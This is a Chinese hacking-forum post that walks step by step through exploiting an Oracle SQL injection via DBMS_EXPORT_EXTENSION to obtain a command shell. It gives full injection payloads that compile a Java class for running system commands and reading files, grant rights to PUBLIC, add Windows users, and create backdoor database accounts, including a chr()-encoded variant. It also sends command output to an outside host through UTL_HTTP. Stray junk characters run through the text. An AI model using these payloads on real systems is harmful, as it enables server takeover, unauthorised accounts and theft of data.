找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2306|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
2 g0 R3 U7 Q7 H5 {
9 Z% w+ X& j) l9 a6 _9 C) ]* e0 a5 w  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
$ Q) F& x3 l- Y. R' K' I4 I! ]的形式即可。(用" 'a'|| "是为了让语句返回true值)
1 ~9 U1 D6 l9 ]! ^' B* `语句有点长,可能要用post提交。 8 ^. ?0 i+ t! Q6 ?0 Y6 Z; i4 g- n1 O7 P, T
以下是各个步骤: ; {6 g: G0 I7 G0 j  f7 x
1.创建包
- l6 w  R  k$ D( X5 H通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
- D1 n3 E# H" ~! z: y, i/xxx.jsp?id=1 and '1'<>'a'||(
6 ^6 r  c! a9 s7 c; P) i9 Jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 @( K8 N3 `9 l% @- l
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(2 k# y9 D' I5 [9 t3 T
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}% w1 D  e3 L* t5 X
}'''';END;'';END;--','SYS',0,'1',0) from dual % m  x" c& K% ?
) " U1 ]5 Y) [2 s+ o8 ?, j
------------------------ # m0 O  x3 v& C1 e" R: r1 D
如果url有长度限制,可以把readFile()函数块去掉,即:
- d" y% j/ l6 `7 U. K/xxx.jsp?id=1 and '1'<>'a'||(
+ t7 S) J, E3 g3 mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 H0 x' c* u) ~0 R3 Z+ q
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(4 f* B# W3 C8 i! M7 t. N
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}. N% T2 w$ O% Y* \; y
}'''';END;'';END;--','SYS',0,'1',0) from dual
$ @0 W3 m' z+ @% B) " X" ]3 N9 u" }
同时把后面步骤 提到的 对readFile()的处理语句去掉。
& U5 X- E! S! l, \* C+ N  m; @------------------------------ . q/ ^" r" _- e5 g
2.赋Java权限 7 z% Z! z1 j4 R( b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual& z$ n1 z+ Y8 N& \! n& V. i- V
3.创建函数
/ w) |5 ~$ J) ^select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* h& b2 T* n5 q" ]( J# Ccreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
% D; F+ O  \: a% s. f& Pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 ?( _  d. p2 w  s2 Wcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
5 {* F9 o8 e) Q1 k. H8 a: R4.赋public执行函数的权限 / i0 C: a7 m& n% ~. q
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
% ]5 [% z( J  b! f+ ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual% q" U* o  l5 H! l* H% s  @
5.测试上面的几步是否成功 ! R( w% k! j8 U0 ?+ e4 x3 W/ d
and '1'<>'11'||( ( Q0 |1 w, q# h
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 7 _! S: z3 q- C7 O. t
)
$ @( B' z7 w0 ]1 Xand '1'<>(
6 q" _1 \# x. x4 {select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
4 T( ?; t, x) `/ x0 v) # J4 S, Q, C3 \) f1 o4 R3 M0 }
6.执行命令: % r5 A! x" w  P5 D
/xxx.jsp?id=1 and '1'<>(
5 v& G8 l2 f0 t- a' [4 s9 s* \, `select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 1 x- }$ s' H4 O( n
2 Q6 j( h$ w; _% v3 U
) 0 u0 y* e0 ?; {: [4 k
/xxx.jsp?id=1 and '1'<>( ( f% j+ b4 T5 {/ D0 G+ C$ T( @  l
select  sys.LinxReadFile('c:/boot.ini') from dual
. S% K1 S4 ?( F6 q) ^
/ K$ p7 D& b, l" f7 D! ]8 ]6 k)! [6 L: X) c$ n( N; w& u# y
  
6 X/ S& E8 N, x& a7 U! f注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
2 Q* N* C, ~, _6 H如果要查看运行结果可以用 union : ) M! _0 E8 b* C6 ~1 c
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual  G4 g4 Q, M8 F
或者UTL_HTTP.request(: 5 r( n  i: ~  i8 Z- ~8 J7 l  P
/xxx.jsp?id=1 and '1'<>(
9 Z* h, ^7 `2 j) A! GSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual( z1 i. @2 z2 Q9 f  \
)
: v4 J0 }/ H  l/xxx.jsp?id=1 and '1'<>( ; }$ g4 ~; ~! @# R+ v8 k; H! P8 N
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
0 s9 G* N' _0 ?1 d* t) 7 o* z: W- U' d# H9 h
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。, v. |8 x  O  l$ h0 c
-------------------- 3 o# H5 F$ \6 m- J& G
6.内部变化 7 n7 w1 i7 T6 K4 q. x
通过以下命令可以查看all_objects表达改变:
; f& N3 O+ q6 m, h: i" y$ v( bselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
' r) ]/ R1 x9 G0 N, ^# `7.删除我们创建的函数
/ Z9 y! {, o7 {, ?+ |0 n7 Y9 @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 _0 ?5 }: p! s, K( F$ Rdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual   o4 }4 R+ z& y( _5 Q1 ~/ t8 I: _! E
====================================================
/ \3 {+ n6 {0 @! y/ a, n全文结束。谨以此文赠与我的朋友。 ( r; ^: E3 g8 f) Z/ ~5 N
linx
- \, V5 T. S5 \; _( K; u124829445 # h8 F& J) A8 H5 Q* Q3 r$ M. ?
2008.1.12
/ p  _4 I! h+ n) B6 Z; V) ]1 ^/ Mlinyujian@bjfu.edu.cn / W9 u3 R/ @4 A: b- n. @
======================================================================
5 O5 V$ Y8 u% X/ K* z5 M测试漏洞的另一方法:
- b3 l6 ]/ x1 u# v! n; S5 }创建oracle帐号: " H, v8 E5 ~0 v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ ]- \! M% V. S4 m, U2 u
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
" N% M4 m! U8 e即: 0 ^% X  t$ m5 {) @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),/ W' W. z! W+ j* b: C0 w2 z
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 2 j4 a" q0 \1 k- y+ _, b8 N' _
确定漏洞存在:
9 K. h" f  q  G1<>( % I- i( P1 G. D6 o" k
select user_id from all_users where username='LINXSQL' 3 f/ ^4 |& z) L+ P3 @& b
)
( I9 S7 g6 [# S5 A" M给linxsql连接权限:
, a$ o+ n$ e8 G* i/ J& N: ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; b6 @7 I5 ]; k5 BGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 9 P! W; k% I* P2 @# e" R
删除帐号: & `0 v1 @& O$ d% T) h  l) e1 `
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 E: l' p* t, g$ |- V! ~+ Zdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
6 c9 P8 h0 J/ ^9 p( w/ Y======================
: C0 b* b% Y, V  H: o以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:. q* P* H" ^5 f7 A$ T
1.jsp?id=1 and '1'<>(
* [3 X# B/ v! X7 X" B. J9 ^; u9 hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', H% c  P# s) w5 |- M' B7 e" Q
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
/ s- F4 C+ |; A/ I3 {) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
* Y6 x& t* D' C. @1 Y5 {2 x/ f7 m )
3 f  x- m* h& E' c: P
7 \2 c+ z# e7 {9 s7 H6 ~. [. ~+ [: Z" ~

" k% Y5 x8 ]8 O, a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表